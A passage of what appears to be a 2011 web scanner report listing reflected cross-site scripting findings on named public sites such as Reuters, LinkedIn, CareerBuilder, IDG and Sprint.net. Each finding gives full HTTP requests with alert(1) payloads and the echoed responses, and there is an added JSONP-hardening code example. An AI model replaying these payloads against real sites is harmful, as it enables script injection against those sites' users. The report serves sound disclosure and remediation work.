TRC.callbacks.recommendations_128a5e<script>alert(1)</script>85decac219a({"trc":{"req":"89ec6e2f6de78af85a24b9efb3c77a44","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_131
...[SNIP]...

5.68. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /Jobseeker/Jobs/JobResults.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80ebc'-alert(1)-'94f3da384dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobseeker/Jobs/JobResults.aspx?80ebc'-alert(1)-'94f3da384dc=1 HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 183016
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEARWEB49
Date: Sun, 04 Sep 2011 01:25:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
'Close';
var sj_isSiteDown = false;
var sj_loginUrl = 'http://www.careerbuilder.com/share/login.aspx?NextUrl=http%3a%2f%2fwww.careerbuilder.com%2fJobseeker%2fJobs%2fJobResults.aspx%3f80ebc'-alert(1)-'94f3da384dc%3d1&ff=21';
var sj_userAuthStatus = 'Unknown';
var sj_saveJobAjaxPageUrl = 'http://www.careerbuilder.com/AJAX/SaveThisJob.aspx';
</script>
...[SNIP]...

5.69. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/rd.nsf/rd

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f740"%3b4cc57824ccb was submitted in the REST URL parameter 1. This input was echoed as 7f740";4cc57824ccb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The sink is the string argument of pageTracker._trackPageview() in the 404 page; issue 5.71 below reaches the same sink with a "-alert(1)-" payload through a query-string parameter name, so the path-segment variant should be re-tested manually with that payload shape before this is treated as unexploitable.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www7f740"%3b4cc57824ccb/rd.nsf/rd HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5080
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www7f740";4cc57824ccb/rd.nsf/rd");
} catch(err) {}</script>
...[SNIP]...

5.70. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/rd.nsf/rd

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 752f0"%3b515516fa31a was submitted in the REST URL parameter 3. This input was echoed as 752f0";515516fa31a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. As with 5.69, the sink is the pageTracker._trackPageview() argument in the 404 page, which 5.71 below shows to be fully exploitable from a query-string parameter name; the last path segment deserves the same manual follow-up.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/rd.nsf/rd752f0"%3b515516fa31a HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5080
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/rd.nsf/rd752f0";515516fa31a");
} catch(err) {}</script>
...[SNIP]...

5.71. http://www.idg.com/www/rd.nsf/rd [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/rd.nsf/rd

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66e21"-alert(1)-"150c1b8488f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/rd.nsf/rd?66e21"-alert(1)-"150c1b8488f=1 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5093
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/rd.nsf/rd?66e21"-alert(1)-"150c1b8488f=1");
} catch(err) {}</script>
...[SNIP]...

5.72. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the application's response without output encoding. The payload f0f49<img%20src%3da%20onerror%3dalert(1)>1b27c3e5a24 was submitted in the url parameter. This input was echoed as f0f49<img src=a onerror=alert(1)>1b27c3e5a24 in the application's response.

The scanner classified the reflection point as plain text between HTML tags, but the response below is a JSONP script (Content-Type: text/javascript) and the value lands inside a JSON string literal passed to IN.Tags.Share.handleCount(). The angle brackets are not escaped (only the slashes are, as \/), so the markup survives verbatim, but it executes only if a browser renders the response as an HTML document rather than as script. Whether a double quote, which is what a breakout from the string in the script context would need, is escaped is not shown in the report. Treat this as a confirmed absence of script-safe encoding with browser-dependent exploitability, and check how the target browsers handle the content type before rating it.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903f0f49<img%20src%3da%20onerror%3dalert(1)>1b27c3e5a24 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:45:54 GMT
Content-Length: 182

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.reuters.com\/article\/2011\/09\/03\/us-weather-football-idUSTRE78222D20110903f0f49<img src=a onerror=alert(1)>1b27c3e5a24"});

5.73. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nbcudigitaladops.com
Path:   /hosted/util/getRemoteDomainCookies.js

Issue detail

The value of the callback request parameter is copied unencoded into the application's response. The payload b935c<script>alert(1)</script>6522d81e549 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

The response is served as application/javascript and the callback value becomes the function name that is invoked, so the reflection is into a JavaScript expression rather than the HTML text context the scanner labelled it as. The injected <script> tag is a syntax error in that context and runs only if the browser treats the response as HTML; a script-context payload of the ;alert(1)// shape used against 5.77 is the appropriate follow-up test. Note also that the response body contains the value of the request's Cookie header for nbcudigitaladops.com, handed to whichever page includes this URL as a script; that is inherent to the endpoint's JSONP design and worth assessing separately from the reflection.

Request

GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallbackb935c<script>alert(1)</script>6522d81e549 HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xa=n

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Sun, 04 Sep 2011 00:52:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:52:42 GMT
Connection: close

__nbcadops_xasis.getRemoteDomainCookiesCallbackb935c<script>alert(1)</script>6522d81e549("xa=n; pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000");

5.74. http://www.reuters.com/assets/commentsChild [articleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the articleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1582a"><script>alert(1)</script>fe132c51c05 was submitted in the articleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D201109031582a"><script>alert(1)</script>fe132c51c05&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 4901

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF01 <![endif]-->
<!--[if !IE]> token: 3d278813-504e-4191-9b77-555036e7e9b3 <
...[SNIP]...
<input type="hidden" name="article_id" value="USTRE78222D201109031582a"><script>alert(1)</script>fe132c51c05" />
...[SNIP]...

5.75. http://www.reuters.com/assets/commentsChild [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1018"><script>alert(1)</script>71adda7c438 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNewsf1018"><script>alert(1)</script>71adda7c438&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5218

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF38 <![endif]-->
<!--[if !IE]> token: 0fe4c1fd-5429-477a-8e92-7320039c4b12 <
...[SNIP]...
<input type="hidden" name="channel" value="domesticNewsf1018"><script>alert(1)</script>71adda7c438" />
...[SNIP]...

5.76. http://www.reuters.com/assets/searchIntercept [blob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/searchIntercept

Issue detail

The value of the blob request parameter is copied into the HTML document as plain text between tags. The payload f02e5<script>alert(1)</script>d14b997ec00 was submitted in the blob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/searchIntercept?blob=notre%20dame%20footballf02e5<script>alert(1)</script>d14b997ec00 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:00:17 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 4 Sep 2011 01:00:18 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 572

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF14 <![endif]-->
<!--[if !IE]> token: a723f467-3f78-4872-b9c9-ee09ff7f28a7 <
...[SNIP]...
<div class="searchTerm">"notre dame footballf02e5<script>alert(1)</script>d14b997ec00"</div>
...[SNIP]...

5.77. http://www.reuters.com/tracker/guid [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /tracker/guid

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce90a%3balert(1)//6021deac1e7 was submitted in the cb parameter. This input was echoed as ce90a;alert(1)//6021deac1e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The endpoint is a JSONP tracker: the callback name is placed in the script twice, once in a typeof guard and once as the call, with no restriction on its characters. A browser navigated directly to the URL will display rather than execute a text/javascript body unless it sniffs the content as HTML, so the practical fix is to restrict cb to identifier characters, not to HTML-encode it. The same request also returns the visitor's tracking userID to any page that includes the URL as a script, which is inherent to JSONP and should be assessed alongside the reflection.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tracker/guid?cb=doTrack8497ce90a%3balert(1)//6021deac1e7 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:33 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/javascript
Content-Length: 150

typeof doTrack8497ce90a;alert(1)//6021deac1e7==='function'&&doTrack8497ce90a;alert(1)//6021deac1e7({"userID":"8962b548-050e-4d67-833b-b346fcad4aac"});
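Findings 5.72, 5.73 and 5.77 share one root cause: a JSONP endpoint that accepts any string as the callback name and serialises its data without script-safe escaping. The following is an added example, not code from LinkedIn, NBCUniversal or Reuters: a framework-neutral responder that restricts the callback to a dotted JavaScript identifier, escapes angle brackets inside the JSON payload so that the <img> of 5.72 cannot survive verbatim, and sets the headers that stop a browser from interpreting the response as HTML. The function names and the {status, headers, body} response shape are assumptions for illustration.

```javascript
// Added example: hardening a JSONP responder (findings 5.72, 5.73, 5.77).
// Not code from the scanned sites; jsonpResponse() is a hypothetical handler.

// Callback names must be dotted identifiers. Every payload in this section
// fails this test: '<', '>', ';', '/', '(' and ')' are outside the class.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// JSON is not script-safe on its own: JSON.stringify leaves '<' and '>'
// untouched, which is exactly what let the <img> in 5.72 through. \u003c
// is a valid JSON escape, so the decoded value is unchanged.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Build the HTTP response as a plain object {status, headers, body}.
function jsonpResponse(callback, data) {
  if (!isValidCallback(callback)) {
    return {
      status: 400,
      headers: { 'Content-Type': 'text/plain; charset=utf-8' },
      body: 'invalid callback name',
    };
  }
  return {
    status: 200,
    headers: {
      // Script MIME type plus nosniff: a browser navigated straight to the
      // URL will not content-sniff the body into an HTML document.
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
      'Cache-Control': 'no-store',
    },
    body: callback + '(' + jsonForScript(data) + ');',
  };
}

// Recover the data argument from a generated body, as a test would.
function parseJsonpBody(body) {
  const open = body.indexOf('(');
  return JSON.parse(body.slice(open + 1, body.lastIndexOf(')')));
}
```

The identifier check is the part that removes the finding: 5.73's callback and 5.77's cb are rejected outright, and the angle-bracket escaping turns 5.72's reflected tag into \u003cimg ...\u003e, which a script consumer still reads back as the original string. What validation cannot fix is the data exposure of a JSONP endpoint itself: anything it returns is readable by any origin that includes it, so the payload should never carry session material.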

5.78. https://www.sprint.net/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9afcf"><script>alert(1)</script>b449dded42e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9afcf"><script>alert(1)</script>b449dded42e=1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:59 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/?9afcf"><script>alert(1)</script>b449dded42e=1" />
...[SNIP]...

5.79. https://www.sprint.net/external_videos/pages.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /external_videos/pages.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e94"><script>alert(1)</script>4a03023a012 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external_videosd5e94"><script>alert(1)</script>4a03023a012/pages.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:13 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 9557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/external_videosd5e94"><script>alert(1)</script>4a03023a012/pages.php" />
...[SNIP]...

5.80. https://www.sprint.net/external_videos/pages.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /external_videos/pages.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be96b"><script>alert(1)</script>94dcba76cca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external_videos/pages.phpbe96b"><script>alert(1)</script>94dcba76cca HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:22 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 9557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/external_videos/pages.phpbe96b"><script>alert(1)</script>94dcba76cca" />
...[SNIP]...

5.81. https://www.sprint.net/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4efbd"><script>alert(1)</script>b6a71b50e9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php4efbd"><script>alert(1)</script>b6a71b50e9c HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:14 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 9541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/index.php4efbd"><script>alert(1)</script>b6a71b50e9c" />
...[SNIP]...

5.82. https://www.sprint.net/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a007"><script>alert(1)</script>e5b7ce49e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?4a007"><script>alert(1)</script>e5b7ce49e23=1 HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:03 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 16897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/index.php?4a007"><script>alert(1)</script>e5b7ce49e23=1" />
...[SNIP]...

5.83. https://www.sprint.net/min/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /min/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b69"><script>alert(1)</script>f9addac0cb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

